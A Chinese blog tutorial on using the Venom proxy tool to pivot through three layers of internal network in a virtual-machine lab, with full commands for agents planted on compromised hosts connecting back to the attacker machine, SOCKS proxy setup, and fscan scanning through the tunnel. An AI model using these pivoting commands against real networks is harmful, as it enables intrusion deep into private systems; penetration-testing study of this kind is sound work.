Venom代理工具使用--以三层代理为例

最新推荐文章于 2024-07-24 17:04:22 发布
置顶 最新推荐文章于 2024-07-24 17:04:22 发布
阅读量1.3k 收藏 19
点赞数 26
分类专栏: 网络安全 CTF 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y920312/article/details/134833878
版权

一、工具下载

Venom是一款由go语言开发的多平台多级代理工具,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点

下载地址:https://github.com/Dliv3/Venom/releases

二、网络环境

使用的是虚拟机模拟的环境,其中攻击机器是本机,其他几层主机为虚拟机。

        

IP分配如下

攻击机win10(主机A):192.168.247.1

win7外网(主机B):外网NAT 192.168.247.152,一层内网 172.16.1.30

win7内网工控(主机C):一层内网 172.16.16.3,二层内网 10.0.10.110

核心机器win2008(主机D):二层内网 10.0.10.111

三、Venom代理步骤

(一)第一层代理

1.在攻击机(192.168.247.1-主机A)上执行:

admin.exe -lport 9000

2.上传Venom对应的agent端(上传版本根据攻击目标系统确定)至win7外网(主机B),执行以下命令:

agent.exe -rhost 192.168.247.1 -rport 9000

此时可观察攻击主机(主机A),发现代理连接成功。

3.然后在攻击机(主机A)上执行命令,将流量代理到7777端口

goto 1
socks 7777

常用命令:show,goto,shell,exit。

① 执行show命令,可以看见刚刚连接成功的一个节点;

② goto 1 可以切换到1节点上面去

③shell 执行命令

④exit 退出,进行下一步的监听操作。

4.此时可测试是否代理成功(可在攻击机(主机A)上用浏览器建立代理或者使用Proxifier工具建立设置代理端口)。

(1)浏览器设置代理测试

(2)使用Proxifier设置进行测试。

5.设置完成后,浏览器尝试访问第一层内网(172.16.1.3),访问成功则代理设置成功。

设置成功后,可以用扫描工具进行第一层内网扫描。

因为fscan用ping做判断。因此扫描命令为:

fs.exe -np -h 172.16.1.3
或者
fs.exe -np -h 172.16.1.3 -proxy socks5://127.0.0.1:7777

(二)第二层代理

1.在攻击机(192.168.247.1--主机A)上节点一(node 1)进行监听,也就是在外网win7(主机B)上等待内网工控win7(主机C)连接。

执行命令:listen 9001

2.内网工控win7(主机C)执行连接命令:

C:\phpStudy\PHPTutorial\WWW> agent.exe -rhost 172.16.1.30 -rport 9001

然后在攻击机(主机A)上执行show,发现两个节点。

继续在攻击机(主机A)上执行以下命令,设置端口代理。

goto 2
socks 6002

3.在攻击机(主机A)的浏览器或者Proxifier进行代理端口设置,进行测试,发现测试成功。

(三)第三层代理

1.继续在攻击机(192.168.247.1--主机A)上节点2(node 2)进行监听,也就是在内网工控win7(主机C)上等待win2008(主机D)连接。

(node 2) >>> listen 9002
listen 9002

2.在windows2008(主机D)上执行代理客户端,命令同上。

C:\phpStudy\PHPTutorial\WWW> agent.exe -rhost 10.0.10.110 -rport 9002

3.执行完后,在攻击机(主机A)上发现代理连接成功。

the port 9002 is successfully listening on the remote node!
(node 2) >>> show
A
+ -- 1
     + -- 2
          + -- 3
(node 2) >>> goto 3
node 3

执行show发现,三层代理已经建立成功。

lcafe8
关注
专栏目录
利用Proxifier配置多级代理
谢公子的博客
09-20 6075
利用Proxifier配置多级代理
睿思麟阁红队攻防分享会| 内网穿透思路整理与工具使用
heitu0的博客
10-12 1301
睿思麟阁红队攻防分享会第五期, 内网穿透思路整理与工具使用
Venom工具使用
weixin_44508748的博客
05-23 4395
前提:已经拿到某服务器shell,可以上传文件且具有执行权限; 项目地址(编译后):https://github.com/Dliv3/Venom/releases 一、进入内网 1.上传admin_linux_x64到vps端,运行并监听本地11111端口: chmod 777 admin_linux_x64 ./ admin_linux_x64 -lport 11111 2.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行 chmod 777 agent_linu
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7602
代理面试常问一.概述代理的本质是socks协议
内网隧道——Venom(毒液)
最新发布
qq_55202378的博客
07-24 1112
Venom工具也被称为“毒液工具”,它是一款开源的多级代理工具使用Go语言开发,支持多种平台。Venom可以将多个节点进行连接,并以节点为跳板构建多级代理搭建网络隧道,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网管理代理节点,利用"毒液"进行可视化网络拓扑、多级Socks5代理、多级端口转发、端口复用(Apache、Mysql等服务)、SSH隧道、交互式Shell、文件的上传和下载、节点间通信加密等。网络拓扑如下:攻击机kali IP:192.168.111.0。
【渗透工具】内网多级代理工具Venom详细使用教程
TT小子的博客
06-28 1704
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
内网穿透工具---Venom使用教程
热门推荐
u011215939的博客
12-05 1万+
介绍 从某个做内网工作的朋友口里面听到这个工具Venom;这是一款为渗透测试人员设计的使用Go开发的多级代理工具Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。这个工具在github上面链接;流弊呀~~~确实是很流弊的 这个工具直接下载编译好的比较方便啦;目录结构: admin agent...
Venom工具使用(内网渗透 多级代理
rang的博客
08-19 3357
在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接 agent监
Venom的简单使用
andiao1218的博客
09-21 810
工具地址:https://github.com/r00t-3xp10it/venom 打开到venom目录,输入./venom.sh 打开程序 按回车键继续 这里有很多的模块,要用哪个模块就输入它的编号,这里测试第11个,输入11回车后,会有一个填IP的弹窗,根据自己的填写 之后会弹出一个填写端口的弹窗,我直接填写666 然后就是命名 设置paylo...
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1502
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
强大的免杀工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
Proxy Switcher Standard(端口代理软件) V5.15.0 官方最新版+破解补丁
03-21
Proxy Switcher Standard 是一款方便易用的代理查找、测试的客户端软件。你使用这款端口代理软件,即可快速获得代理列表,以及代理服务器所在地,并提供状态信息,免除额外手动设置代理的繁琐,并且快速在代理与直连等网络环境中切换。 Proxy Switcher Standard   这款代理客户端的Standard是免费使用的,你也可以在当下软件搜索对应的PRO版本,体验更强大的功能。Proxy Switcher同时支持多种宽带接入方式,并且能够自动检测网络状态,是一款专业的代理软件。
端口代理
04-18
NULL 博文链接:https://unbelievable0-gmail-com.iteye.com/blog/1848849
端口映射通用代理工具Port
08-14
通用端口映射通用代理工具PortTunnel目前最好的端口转发器、端口映射工具(外部计算机可以访问局部内的计算机HTTPFTP),TCPIP 端口重定向记录。通过在服务器安装运行此程序, 可以使因特网上的计算机访问局部网内的计算机建立的HTTP、FTP与SMTP服务,包含IP 安全(与Win2KWinXP 上秘密端口)。
电脑配置端口映射通用代理工具
10-12
端口映射通用代理工具,可以配置端口转发,代理,访问计算机某端口时,转到到其他机器的某个端口
西域大都护府 第四期cfs靶场 渗透记录
ShenZ的博客
02-14 2080
西域大都护府 第四期cfs靶场 渗透记录1.DEDECMS2.二层探测+转发2.1 tomcat2.2 shiro2.3 weblogic3.第三层 官方wp: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w 内网拓扑图 1.DEDECMS 首先是dedecms,会员功能被关闭了,那个前台的登陆口没法用 ps.dedecms一些漏洞 文件上传的payload:https://zhzhdoai.github.io/2019/07/28/Dedec
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3851
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
FRP三层代理实验
qq_42383069的博客
03-22 2334
环境简介 **0x01. Win Server2012** 1. ip_1:192.168.0.154 2. ip_2: 10.10.20.12(仅主机模式) 3. user/passwd : Administrator:Admin12345 **0x02. Win 7** 4. ip_1: 10.10.20.7(仅主机模式) 5. ip_2: 10.10.10.7(仅主机模式) 6. 本地管理员:john:admin!@#45 域账户:redteam\saul:admin!@#45 *
"Venom-2021国际精英挑战赛强网拟态防御WriteUp1
2021年强网拟态防御国际精英挑战赛Venom于2021年举行,是一场涉及Web安全领域的国际竞赛。比赛中出现了一个值得关注的WriteUp1,其中涉及到了一个能够读取...Venom-2021,期待更多精英参与,共同开创网络安全的新篇章。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值